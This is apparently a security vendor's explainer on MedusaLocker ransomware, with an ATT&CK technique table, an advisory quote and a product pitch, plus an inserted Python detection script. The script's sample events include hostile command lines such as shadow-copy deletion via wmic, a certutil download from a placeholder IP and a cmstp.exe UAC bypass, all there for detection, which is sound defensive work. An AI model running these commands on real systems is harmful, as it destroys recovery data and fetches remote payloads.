
MedusaLocker Ransomware-As-A-Service (RAAS) Explained

What is MedusaLocker Ransomware?

MedusaLocker is a RaaS (Ransomware as a Service) variant that was first discovered in 2019 and has since been used in attacks worldwide. To make the encryption harder to recover from, MedusaLocker removes volume shadow copies and disables system services before encrypting data with AES-256.

The MedusaLocker ransomware is typical ransomware that encrypts its victim's data and demands ransom for the decryption key. The MedusaLocker malware threat doesn't seem to have resulted in any data exfiltration, though it does threaten victims with releasing sensitive data.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) have released a joint advisory stating that "MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims' networks. The MedusaLocker actors encrypt the victim's data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to transfer ransomware payments to a specific Bitcoin wallet address."

MedusaLocker Ransomware - MITRE ATT&CK TTPs

MedusaLocker actors use the ATT&CK techniques listed in Table 1.

Initial Access

| Technique Title | ID | Use |
|---|---|---|
| External Remote Services | T1133 | MedusaLocker actors gained access to victim devices through vulnerable RDP configurations. |
| Phishing | T1566 | MedusaLocker actors used phishing and spearphishing to obtain access to victims' networks. |
| Valid Accounts | T1078 | Threat actors use brute-force password guessing for RDP services. The revealed password allows the attacker to gain initial access to the victim's network. |

Execution

| Technique Title | ID | Use |
|---|---|---|
| Command and Scripting Interpreter: PowerShell | T1059.001 | MedusaLocker actors may abuse PowerShell commands and scripts for execution. |
| Windows Management Instrumentation | T1047 | MedusaLocker uses the Windows Management Instrumentation command-line utility (wmic) to delete volume shadow copies, preventing victims from recovering their encrypted data. |

Persistence

| Technique Title | ID | Use |
|---|---|---|
| Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547 | MedusaLocker establishes persistence and executes the ransomware at system startup by adding the following registry entry. |

Privilege Escalation

| Technique Title | ID | Use |
|---|---|---|
| Abuse Elevation Control Mechanism: Bypass UAC | T1548.002 | MedusaLocker ransomware uses the built-in Windows tool Microsoft Connection Manager Profile Installer (cmstp.exe) to bypass User Account Control (UAC) and run arbitrary commands with elevated privileges. |
| Valid Accounts | T1078 | Threat actors use brute-force password guessing for RDP services. If the guessed password belongs to the domain administrator, they can execute commands with elevated privileges. |

Defense Evasion

| Technique Title | ID | Use |
|---|---|---|
| Impair Defenses: Disable or Modify Tools | T1562.001 | MedusaLocker disables security products such as antivirus to avoid being detected. |
| Impair Defenses: Safe Mode Boot | T1562.009 | MedusaLocker actors may abuse Windows safe mode to disable endpoint defenses. Safe mode starts the Windows operating system with a limited set of drivers and services. |

Credential Access

| Technique Title | ID | Use |
|---|---|---|
| Brute Force | T1110 | Threat actors use brute-force password guessing for RDP services. |

Discovery

| Technique Title | ID | Use |
|---|---|---|
| File and Directory Discovery | T1083 | MedusaLocker searches for files and directories on the victim's computer. After discovery, the ransomware starts to encrypt all files and directories. |
| Network Share Discovery | T1135 | MedusaLocker searches for shared files in the network. The shared files also indicate that there may be other hosts in the network that can be reached by lateral movement. |
| Query Registry | T1012 | MedusaLocker searches the registry hive to learn about security products deployed in the victim's network. |

Lateral Movement

| Technique Title | ID | Use |
|---|---|---|
| Remote Services | T1021 | MedusaLocker ransomware uses remote services to infect other hosts in the victim's network. Threat actors use RDP, PsExec, and SMB to spread the ransomware payload. |

Command and Control

| Technique Title | ID | Use |
|---|---|---|
| Ingress Tool Transfer | T1105 | MedusaLocker uses certutil.exe to transfer files from its command and control server to the victim's network. |

Impact

| Technique Title | ID | Use |
|---|---|---|
| Data Encrypted for Impact | T1486 | MedusaLocker actors encrypt data on target systems, or on large numbers of systems in a network, to interrupt the availability of system and network resources. |
| Inhibit System Recovery | T1490 | MedusaLocker actors may deny access to operating system features that can help repair corrupted systems, such as the backup catalog, volume shadow copies, and automatic repair. |

Table 1: MedusaLocker Actors ATT&CK Techniques for Enterprise
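The techniques in Table 1 can be turned into detection logic. The following is an added example, not code from the page or from NetSecurity: it runs a few rules for the wmic shadow-copy deletion (T1047), cmstp.exe abuse (T1548.002), certutil download (T1105), Run-key persistence (T1547) and RDP brute force (T1110) over constructed, SIEM-style events; the hostnames, paths, IPs and the brute-force threshold are assumptions made up for the example.

```python
import re
from collections import Counter

# Constructed sample telemetry for this example (not taken from the page): process-creation,
# registry-write and logon events in the shape a SIEM would normalise them into.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /s C:\Users\Public\profile.inf"},
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -f http://203.0.113.7/update.bin update.bin"},
    {"host": "ws01", "type": "registry", "value": "updater",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},  # benign control event, should not match
] + [{"host": "srv02", "type": "logon", "event_id": 4625, "logon_type": 10,
      "src": "198.51.100.9", "user": f"user{i}"} for i in range(12)]

def _inf_outside_windows(cmdline):
    # cmstp.exe legitimately installs .inf profiles from the Windows directory;
    # an .inf under a user-writable path is the suspicious case.
    m = re.search(r"(\S+\.inf)\b", cmdline, re.I)
    return bool(m) and not m.group(1).lower().startswith(r"c:\windows")

# (ATT&CK ID from Table 1, description, predicate over one process or registry event)
RULES = [
    ("T1047", "wmic used to delete volume shadow copies",
     lambda e: e["type"] == "process" and e["image"].lower().endswith("wmic.exe")
     and re.search(r"shadowcopy\s+delete", e["cmdline"], re.I) is not None),
    ("T1548.002", "cmstp.exe launched with an .inf outside the Windows directory",
     lambda e: e["type"] == "process" and e["image"].lower().endswith("cmstp.exe")
     and _inf_outside_windows(e["cmdline"])),
    ("T1105", "certutil used to download a file from a remote host",
     lambda e: e["type"] == "process" and e["image"].lower().endswith("certutil.exe")
     and re.search(r"-urlcache|https?://", e["cmdline"], re.I) is not None),
    ("T1547", "autostart entry written under a Run key",
     lambda e: e["type"] == "registry" and e["key"].lower().endswith(r"\run")),
]

def hunt(events, brute_threshold=10):
    """Return (ATT&CK ID, host, detail) hits for the MedusaLocker TTPs in Table 1."""
    hits = [(tid, e["host"], desc) for e in events for tid, desc, pred in RULES if pred(e)]
    # T1110: repeated failed RDP logons (event 4625, logon type 10) from one source
    failures = Counter((e["host"], e["src"]) for e in events
                       if e["type"] == "logon" and e["event_id"] == 4625 and e["logon_type"] == 10)
    for (host, src), n in failures.items():
        if n >= brute_threshold:
            hits.append(("T1110", host, f"{n} failed RDP logons from {src}"))
    return hits

if __name__ == "__main__":
    for tid, host, detail in hunt(SAMPLE_EVENTS):
        print(f"{host}: {tid} {detail}")
```

In production the same predicates would run over Sysmon event 1/13 and Security event 4625 data; the brute-force count should additionally be bounded to a time window.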

How to Stop MedusaLocker Ransomware from Spreading?

You can stop MedusaLocker ransomware from spreading by isolating the infected devices from the rest of your network. Disconnecting the device helps stop the ransomware from encrypting files on other devices. Once devices are isolated, you can start scanning with antivirus software to remove the malware and any backdoors that have been left behind.

How to Detect and Prevent MedusaLocker Ransomware Attack?

Cyber security threats and ransomware attacks are increasing at a tremendous pace. It is extremely difficult for cyber security analysts and incident responders to investigate and detect cyber security threats using conventional tools and techniques. NetSecurity’s ThreatResponder, with its diverse capabilities, can help your team detect the most advanced cyber threats, including APTs, zero-day attacks, and ransomware attacks. It can also help automate incident response actions across millions of endpoints, making it easy, fast, and hassle-free.

Want to see ThreatResponder, our cutting-edge Endpoint Detection & Response (EDR) platform, and ThreatResponder FORENSICS, the Swiss Army knife for forensic investigators, in action? Request a free demo of NetSecurity's ThreatResponder platform.


Disclaimer

The page's content shall be deemed proprietary and privileged information of NETSECURITY CORPORATION. It shall be noted that the contents of this page are copyrighted by NETSECURITY CORPORATION. Any violation/misuse/unauthorized use of this content "as is" or "modified" shall be considered illegal and subjected to articles and provisions that have been stipulated in the General Data Protection Regulation (GDPR) and Personal Data Protection Law (PDPL).

I am an experienced and CEH certified cybersecurity professional with expertise in incident response, forensic investigations, cyber threat intelligence, vulnerability mgmt. and cyber threat research.
About Inno Eroraha
Dulles, Virginia
Inno Eroraha is the Founder & Chief Strategist of NetSecurity Corporation, a cybersecurity products and services company based in Dulles, VA. NetSecurity is the developer of ThreatResponder Platform.